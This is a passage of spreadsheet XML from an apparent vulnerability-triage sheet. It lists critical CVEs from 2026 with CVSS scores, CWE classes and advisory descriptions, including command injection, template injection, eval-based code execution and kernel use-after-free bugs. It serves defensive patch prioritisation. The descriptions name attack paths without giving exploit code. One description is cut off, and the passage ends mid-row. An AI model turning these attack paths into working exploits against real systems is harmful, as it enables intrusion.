    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52490</t>
        </is>
      </c>
      <c r="C172" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D172" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E172" s="5" t="inlineStr"/>
      <c r="F172" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G172" s="5" t="inlineStr">
        <is>
          <t>db2</t>
        </is>
      </c>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the process_command_opts() function in tools/tiffcrop.c</t>
        </is>
      </c>
      <c r="M172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52490</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52889</t>
        </is>
      </c>
      <c r="C173" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D173" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E173" s="5" t="inlineStr"/>
      <c r="F173" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L173" s="5" t="inlineStr">
        <is>
          <t>Formie is a Craft CMS plugin for creating forms. Prior to 3.1.27, Formie can pass request-derived Hidden field defaults such as HTTP User Agent, Referer URL, Current URL, Current URL without Query String, Query Parameter, and Cookie Value to Craft's Twig rendering layer during front-end form rendering. An unauthenticated attacker can place Twig syntax in one of these request-controlled inputs when a public form contains an affected Hidden field. Hidden::getFrontEndInputOptions() then assigns the value to defaultValue and calls renderString, causing server-side template evaluation rather than treating the request data as a plain string. Depending on the Craft site configuration and available Twig capabilities, exploitation can disclose sensitive information, modify application state, or achieve remote code execution. This issue is fixed in version 3.1.27.</t>
        </is>
      </c>
      <c r="M173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52889</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52924</t>
        </is>
      </c>
      <c r="C174" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D174" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E174" s="5" t="inlineStr"/>
      <c r="F174" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G174" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H174" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I174" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: purge outqueue on stale COOKIE-ECHO handling
sctp_stream_update() is only invoked when the association is moved into
COOKIE_WAIT during association setup/reconfiguration. In this path, the
outbound stream scheduler state (stream-&gt;out_curr) is expected to be
clean, since no user data should have been transmitted yet unless the
state machine has already partially progressed.
However, a corner case exists in sctp_sf_do_5_2_6_stale(): when a
Stale Cookie ERROR is received, the association is rolled back from
COOKIE_ECHOED to COOKIE_WAIT. In this scenario, user data may already
have been queued and even bundled with the COOKIE-ECHO chunk.
During the rollback, sctp_stream_update() frees the old stream table
and installs a new one, but it does not invalidate stream-&gt;out_curr.
As a result, out_curr may still point to a freed sctp_stream_out
entry from the previous stream state.
Later, SCTP scheduler dequeue paths (FCFS, RR, PRIO, etc.) rely on
stream-&gt;out_curr-&gt;ext, which can lead to use-after-free once the old
stream state has been released via sctp_stream_free().
This results in crashes such as (reported by Yuqi):
  BUG: KASAN: slab-use-after-free in sctp_sched_fcfs_dequeue+0x13a/0x140
  Read of size 8 at addr ff1100004d4d3208 by task mini_poc/9312
  CPU: 1 UID: 1001 PID: 9312 Comm: mini_poc Not tainted
     7.1.0-rc1-00305-gbd3a4795d574 #5 PREEMPT(full)
   sctp_sched_fcfs_dequeue+0x13a/0x140
   sctp_outq_flush+0x1603/0x33e0
   sctp_do_sm+0x31c9/0x5d30
   sctp_assoc_bh_rcv+0x392/0x6f0
   sctp_inq_push+0x1db/0x270
   sctp_rcv+0x138d/0x3c10
Fix this by fully purging the association outqueue when handling the
Stale Cookie case. This ensures all pending transmit and retransmit
state is dropped, and any scheduler cached pointers are invalidated,
making it safe to rebuild stream state during COOKIE_WAIT restart.
Updating only stream-&gt;out_curr would be insufficient, since queued
and retransmittable data would still reference the old stream state and
trigger later use-after-free in dequeue paths.</t>
        </is>
      </c>
      <c r="M174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52924</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53002</t>
        </is>
      </c>
      <c r="C175" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D175" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E175" s="5" t="inlineStr"/>
      <c r="F175" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G175" s="5" t="inlineStr">
        <is>
          <t>linux kernel, f5</t>
        </is>
      </c>
      <c r="H175" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I175" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L175" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: conntrack: remove sprintf usage
Replace it with scnprintf, the buffer sizes are expected to be large enough
to hold the result, no need for snprintf+overflow check.
Increase buffer size in mangle_content_len() while at it.
BUG: KASAN: stack-out-of-bounds in vsnprintf+0xea5/0x1270
Write of size 1 at addr [..]
 vsnprintf+0xea5/0x1270
 sprintf+0xb1/0xe0
 mangle_content_len+0x1ac/0x280
 nf_nat_sdp_session+0x1cc/0x240
 process_sdp+0x8f8/0xb80
 process_invite_request+0x108/0x2b0
 process_sip_msg+0x5da/0xf50
 sip_help_tcp+0x45e/0x780
 nf_confirm+0x34d/0x990
 [..]</t>
        </is>
      </c>
      <c r="M175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53002</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53006</t>
        </is>
      </c>
      <c r="C176" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D176" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E176" s="5" t="inlineStr"/>
      <c r="F176" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G176" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H176" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I176" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix possible UAF in icmpv6_rcv()
Caching saddr and daddr before pskb_pull() is problematic
since skb-&gt;head can change.
Remove these temporary variables:
- We only access &amp;ipv6_hdr(skb)-&gt;saddr and &amp;ipv6_hdr(skb)-&gt;daddr
  when net_dbg_ratelimited() is called in the slow path.
- Avoid potential future misuse after pskb_pull() call.</t>
        </is>
      </c>
      <c r="M176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53006</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53545</t>
        </is>
      </c>
      <c r="C177" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D177" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E177" s="5" t="inlineStr"/>
      <c r="F177" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the DELETE /ssh/tunnel/disconnect/:tunnelName teardown path in src/backend/ssh/tunnel.ts interpolates endpointPort, sourcePort, endpointUsername, and endpointIP into single-quoted pkill -f patterns. An authenticated user who can edit a tunnel host field can include a single quote to terminate the pattern and append a shell command, which executes when the tunnel is disconnected. Successful exploitation runs arbitrary commands on the source SSH host with the privileges of the connected SSH account. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53545</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53611</t>
        </is>
      </c>
      <c r="C178" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D178" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E178" s="5" t="inlineStr"/>
      <c r="F178" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>Looking Glass is a modern, stateless network-diagnostic platform — a single self-contained Go binary that fronts a fleet of routers over SSH and exposes ping / traceroute / BGP lookups through a gRPC (ConnectRPC) API, an embedded SvelteKit web UI, and a lg-cli client. Prior to version 1.3.5, there is an OS Command Injection vulnerability resulting from an unanchored regular expression in the input validation layer. This issue has been patched in version 1.3.5.</t>
        </is>
      </c>
      <c r="M178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53611</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54569</t>
        </is>
      </c>
      <c r="C179" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D179" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E179" s="5" t="inlineStr"/>
      <c r="F179" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G179" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-95</t>
        </is>
      </c>
      <c r="L179" s="5" t="inlineStr">
        <is>
          <t>SENAITE.CORE is the core framework for the SENAITE laboratory information management system. From 2.0.0 to 2.6.0, the SENAITE.CORE JSON API permits unauthenticated remote code execution through a two-request chain involving missing authorization and unsafe evaluation. The state-changing routes in src/bika/lims/jsonapi/update.py, including update, update_many, remove, doActionFor, doActionFor_many, and getusers, do not enforce the senaite.core: Access JSON API permission before resolving attacker-selected objects. In src/bika/lims/jsonapi/init.py, set_fields_from_request passes raw request values for RecordsField and RecordField instances to eval() before field mutator write-permission checks execute. An anonymous attacker can discover the bika_setup object identifier through @@uuid, send a value such as RejectionReasons to /@@API/update, and execute arbitrary Python in the Zope worker before a later mutation failure rolls back ZODB changes. The same unsafe evaluation pattern is present in src/senaite/core/browser/fields/record.py and src/senaite/core/browser/fields/records.py. Successful exploitation can expose or modify laboratory data, files, and accounts and can disrupt the service.</t>
        </is>
      </c>
      <c r="M179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54569</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55546</t>
        </is>
      </c>
      <c r="C180" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D180" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E180" s="5" t="inlineStr"/>
      <c r="F180" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G180" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>QWED-MCP i</t>
        </is>
      </c>
      <c r="M180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55546</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55559</t>
        </is>
      </c>
      <c r="C181" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D181" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E181" s="5" t="inlineStr"/>
      <c r="F181" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G181" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs inserts templateArgs from POST /api/instances and PATCH /api/instances/{instance} into YAML through VarStatement.append in yamcs-core/src/main/java/org/yamcs/templating/VarStatement.java without YAML-context escaping. The rendered configuration is parsed by YamcsServer.createInstance and loaded by YamcsServerInstance, allowing an attacker to inject a services entry for org.yamcs.ProcessRunner. Deployments without security.yaml expose the operation through the guest superuser, while secured deployments require SystemPrivilege.CreateInstances. Successful exploitation executes commands as the Yamcs service account. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55559</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56207</t>
        </is>
      </c>
      <c r="C182" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D182" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E182" s="5" t="inlineStr"/>
      <c r="F182" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G182" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H182" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I182" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L182" s="5" t="inlineStr">
        <is>
          <t>Signature of Bearer token is not verified in last step of SAML2 authentication for Impala's hs2-http interface, allowing altering user name and acting as another user.
This issue affects Apache Impala: &gt;=4.0.0.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="M182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56207</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57967</t>
        </is>
      </c>
      <c r="C183" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D183" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E183" s="5" t="inlineStr"/>
      <c r="F183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G183" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can craft a CORE protocol SESSION_REATTACH packet to steal an existing session and assume ongoing execution of the previously authenticated session.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57967</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="C184" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D184" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E184" s="5" t="inlineStr"/>
      <c r="F184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G184" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="L184" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Message Server does not sufficiently validate the authenticity of internal application server components during registration. An unauthenticated attacker with network access to the affected service could exploit this weakness to register an unauthorized component and potentially perform unauthorized actions within the application environment, resulting in a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="M184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58822</t>
        </is>
      </c>
      <c r="C185" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D185" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E185" s="5" t="inlineStr"/>
      <c r="F185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61808</t>
        </is>
      </c>
      <c r="C186" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D186" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E186" s="5" t="inlineStr"/>
      <c r="F186" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L186" s="5" t="inlineStr">
        <is>
          <t>LightRAG provides simple and fast retrieval-augmented generation. Through version 1.5.4, the LightRAG API server binds to all network interfaces with authentication disabled by default, allowing an unauthenticated network attacker to read indexed document content, upload or delete documents, modify the knowledge graph, cancel pipelines, clear caches, and consume LLM resources. This issue is mitigated in version 1.5.5rc1.</t>
        </is>
      </c>
      <c r="M186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61808</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62916</t>
        </is>
      </c>
      <c r="C187" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D187" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E187" s="5" t="inlineStr"/>
      <c r="F187" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G187" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H187" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="I187" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass using an alternate path or channel in Microsoft Entra ID allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62916</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63223</t>
        </is>
      </c>
      <c r="C188" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D188" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E188" s="5" t="inlineStr"/>
      <c r="F188" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>CodeIgniter is a PHP full-stack web framework. Prior to 4.7.4, the is_image and mime_in upload validation rules do not independently enforce a safe client filename extension, allowing a remote attacker to upload executable content when an application preserves the client filename and stores uploads in a web-accessible script-enabled directory. Applications are impacted when they validate uploads using is_image or mime_in without an independent safe extension check (such as ext_in on patched versions), save uploaded files using the client-supplied filename, and place uploads in a web-accessible directory where PHP files can execute. This issue is fixed in version 4.7.4.</t>
        </is>
      </c>
      <c r="M188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63223</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66302</t>
        </is>
      </c>
      <c r="C189" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D189" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E189" s="5" t="inlineStr"/>
      <c r="F189" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L189" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67868</t>
        </is>
      </c>
      <c r="C190" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D190" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E190" s="5" t="inlineStr"/>
      <c r="F190" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L190" s="5" t="inlineStr">
        <is>
          <t>A heap-based out-of-bounds write vulnerability exists in S2OPC 1.7.3 in server-side EventFilter handling during CreateMonitoredItems processing. This allows a remote attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67868</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67917</t>
        </is>
      </c>
      <c r="C191" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D191" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E191" s="5" t="inlineStr"/>
      <c r="F191" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
